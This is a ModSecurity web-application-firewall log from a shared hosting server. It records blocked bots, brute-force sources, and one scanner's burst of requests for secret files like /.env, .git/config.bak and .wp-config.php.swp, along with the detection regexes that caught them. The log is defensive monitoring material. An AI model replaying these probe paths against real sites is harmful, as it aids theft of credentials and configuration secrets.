[Tue May 26 14:29:33.168023 2026] [security2:error] [pid 610693:tid 610876] [client 1.20.206.162:36878] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg9TvNO3hpmlY6M8Rr_wAAADU"]
[Tue May 26 14:29:33.315725 2026] [security2:error] [pid 610693:tid 610946] [client 62.244.225.226:25834] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVg9TvNO3hpmlY6M8Rr_gAAAHs"]
[Tue May 26 14:29:34.639993 2026] [security2:error] [pid 610693:tid 610930] [client 1.20.206.162:37634] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg9jvNO3hpmlY6M8RsHwAAAGs"]
[Tue May 26 14:29:34.660944 2026] [security2:error] [pid 606909:tid 607143] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg9l0yRtX9qA7aVUVwoQAAAO0"]
[Tue May 26 14:29:34.680496 2026] [security2:error] [pid 610693:tid 610930] [client 1.20.206.162:37634] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg9jvNO3hpmlY6M8RsHwAAAGs"]
[Tue May 26 14:29:36.132947 2026] [security2:error] [pid 610693:tid 610900] [client 1.20.206.162:38402] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg-DvNO3hpmlY6M8RsNgAAAE0"]
[Tue May 26 14:29:36.178811 2026] [security2:error] [pid 610693:tid 610900] [client 1.20.206.162:38402] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg-DvNO3hpmlY6M8RsNgAAAE0"]
[Tue May 26 14:29:36.812143 2026] [security2:error] [pid 610693:tid 610910] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg-DvNO3hpmlY6M8RsPQAAAFc"]
[Tue May 26 14:29:37.162611 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:53939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg-TvNO3hpmlY6M8RsSAAAAH4"]
[Tue May 26 14:29:37.162742 2026] [security2:error] [pid 610693:tid 610949] [client 202.141.83.254:53939] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg-TvNO3hpmlY6M8RsSAAAAH4"]
[Tue May 26 14:29:38.149595 2026] [security2:error] [pid 610693:tid 610826] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg-TvNO3hpmlY6M8RsUgAAAAM"]
[Tue May 26 14:29:40.949692 2026] [security2:error] [pid 606909:tid 607099] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg_F0yRtX9qA7aVUVw9wAAAME"]
[Tue May 26 14:29:42.378413 2026] [security2:error] [pid 606909:tid 607068] [client 202.76.141.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg_V0yRtX9qA7aVUVxBgAAAKI"]
[Tue May 26 14:29:42.919752 2026] [security2:error] [pid 606909:tid 607058] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg_l0yRtX9qA7aVUVxDwAAAJg"]
[Tue May 26 14:29:43.021116 2026] [security2:error] [pid 606909:tid 607079] [client 167.71.198.58:55681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.198.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/xmlrpc.php"] [unique_id "ahVg_l0yRtX9qA7aVUVxFAAAAK0"], referer: https://shapeacademy.pl//blog//wp-login.php
[Tue May 26 14:29:43.225208 2026] [security2:error] [pid 606909:tid 607097] [client 23.21.212.31:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVg_10yRtX9qA7aVUVxHAAAAL8"]
[Tue May 26 14:29:43.225759 2026] [security2:error] [pid 606909:tid 607070] [client 23.21.212.31:19054] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVg_10yRtX9qA7aVUVxGgAAAKQ"]
[Tue May 26 14:29:43.435806 2026] [security2:error] [pid 606909:tid 607143] [client 23.21.212.31:47428] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahVg_10yRtX9qA7aVUVxIgAAAO0"]
[Tue May 26 14:29:45.112113 2026] [security2:error] [pid 606909:tid 607132] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhAF0yRtX9qA7aVUVxMwAAAOI"]
[Tue May 26 14:29:46.097929 2026] [security2:error] [pid 610693:tid 610918] [client 167.71.198.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahVhATvNO3hpmlY6M8RsrAAAAF8"], referer: https://shapeacademy.pl//blog//wp-login.php
[Tue May 26 14:29:47.388876 2026] [security2:error] [pid 606909:tid 607040] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhAl0yRtX9qA7aVUVxSgAAAIY"]
[Tue May 26 14:29:47.580057 2026] [security2:error] [pid 610693:tid 610944] [client 202.141.83.254:5635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswQAAAHk"]
[Tue May 26 14:29:47.580158 2026] [security2:error] [pid 610693:tid 610944] [client 202.141.83.254:5635] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswQAAAHk"]
[Tue May 26 14:29:47.633239 2026] [security2:error] [pid 610693:tid 610833] [client 1.20.206.162:44099] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswwAAAAo"]
[Tue May 26 14:29:47.730423 2026] [security2:error] [pid 610693:tid 610833] [client 1.20.206.162:44099] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswwAAAAo"]
[Tue May 26 14:29:47.730491 2026] [security2:error] [pid 610693:tid 610833] [client 1.20.206.162:44099] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVhAzvNO3hpmlY6M8RswwAAAAo"]
[Tue May 26 14:29:49.180208 2026] [security2:error] [pid 610693:tid 610864] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhBDvNO3hpmlY6M8Rs2gAAACk"]
[Tue May 26 14:29:49.675001 2026] [security2:error] [pid 610693:tid 610789] [remote 173.252.87.113:51042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 113.87.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVhBTvNO3hpmlY6M8Rs6AAAW18"]
[Tue May 26 14:29:50.393287 2026] [security2:error] [pid 610693:tid 610793] [remote 74.7.241.58:44238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVhBjvNO3hpmlY6M8Rs9wAASWM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 14:29:51.298395 2026] [security2:error] [pid 610693:tid 610903] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhBjvNO3hpmlY6M8Rs_wAAAFA"]
[Tue May 26 14:29:51.442529 2026] [security2:error] [pid 610693:tid 610841] [client 114.119.135.201:40311] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "aastha-enterprises.com"] [uri "/tracking.html"] [unique_id "ahVhBzvNO3hpmlY6M8RtAwAAABI"], referer: https://aastha-enterprises.com/
[Tue May 26 14:29:51.919896 2026] [security2:error] [pid 606909:tid 607005] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahVhB10yRtX9qA7aVUVxbwAAxV8"]
[Tue May 26 14:29:51.923171 2026] [security2:error] [pid 606909:tid 607005] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/*update.cgi*"] [unique_id "ahVhB10yRtX9qA7aVUVxcgAAxV8"]
[Tue May 26 14:29:51.924216 2026] [security2:error] [pid 606909:tid 606913] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backend/.env"] [unique_id "ahVhB10yRtX9qA7aVUVxdQAAxQM"]
[Tue May 26 14:29:52.068042 2026] [security2:error] [pid 606909:tid 606923] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahVhCF0yRtX9qA7aVUVxgAAAxQ0"]
[Tue May 26 14:29:52.068128 2026] [security2:error] [pid 606909:tid 607017] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.docker/.env"] [unique_id "ahVhCF0yRtX9qA7aVUVxfAAAxWs"]
[Tue May 26 14:29:52.069372 2026] [security2:error] [pid 606909:tid 606919] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVhCF0yRtX9qA7aVUVxgQAAxQk"]
[Tue May 26 14:29:52.075920 2026] [security2:error] [pid 606909:tid 606922] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.backup"] [unique_id "ahVhCF0yRtX9qA7aVUVxhQAAxQw"]
[Tue May 26 14:29:52.207558 2026] [security2:error] [pid 606909:tid 606927] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.bak"] [unique_id "ahVhCF0yRtX9qA7aVUVxhgAAxRE"]
[Tue May 26 14:29:52.219228 2026] [security2:error] [pid 606909:tid 606928] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.php"] [unique_id "ahVhCF0yRtX9qA7aVUVxkgAAxRI"]
[Tue May 26 14:29:52.220089 2026] [security2:error] [pid 606909:tid 606934] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.old"] [unique_id "ahVhCF0yRtX9qA7aVUVxkQAAxRg"]
[Tue May 26 14:29:52.365373 2026] [security2:error] [pid 606909:tid 607023] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.swp"] [unique_id "ahVhCF0yRtX9qA7aVUVxnAAAxXE"]
[Tue May 26 14:29:52.366531 2026] [security2:error] [pid 606909:tid 606950] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env~"] [unique_id "ahVhCF0yRtX9qA7aVUVxngAAxSg"]
[Tue May 26 14:29:52.501894 2026] [security2:error] [pid 606909:tid 607029] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config.bak"] [unique_id "ahVhCF0yRtX9qA7aVUVxqgAAxXc"]
[Tue May 26 14:29:52.511741 2026] [security2:error] [pid 606909:tid 607025] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config.old"] [unique_id "ahVhCF0yRtX9qA7aVUVxqwAAxXM"]
[Tue May 26 14:29:52.511741 2026] [security2:error] [pid 606909:tid 606958] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config~"] [unique_id "ahVhCF0yRtX9qA7aVUVxrAAAxTA"]
[Tue May 26 14:29:52.791878 2026] [security2:error] [pid 606909:tid 607076] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhCF0yRtX9qA7aVUVxpgAAAKo"]
[Tue May 26 14:29:53.292364 2026] [security2:error] [pid 606909:tid 606987] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVhCV0yRtX9qA7aVUVx5wAAkU0"]
[Tue May 26 14:29:53.299039 2026] [autoindex:error] [pid 606909:tid 606992] [remote 195.178.110.199:50950] AH01276: Cannot serve directory /home2/azurm42s/gestionbar.azurmediatec.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:29:53.307483 2026] [security2:error] [pid 606909:tid 606920] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/ADMIN/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx6gAAkQo"]
[Tue May 26 14:29:53.414561 2026] [security2:error] [pid 606909:tid 606994] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/API/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx9AAAuVQ"]
[Tue May 26 14:29:53.454487 2026] [security2:error] [pid 606909:tid 607015] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/APP/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx-gAA_Gk"]
[Tue May 26 14:29:53.455260 2026] [security2:error] [pid 606909:tid 607013] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Api/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx-wAA_Gc"]
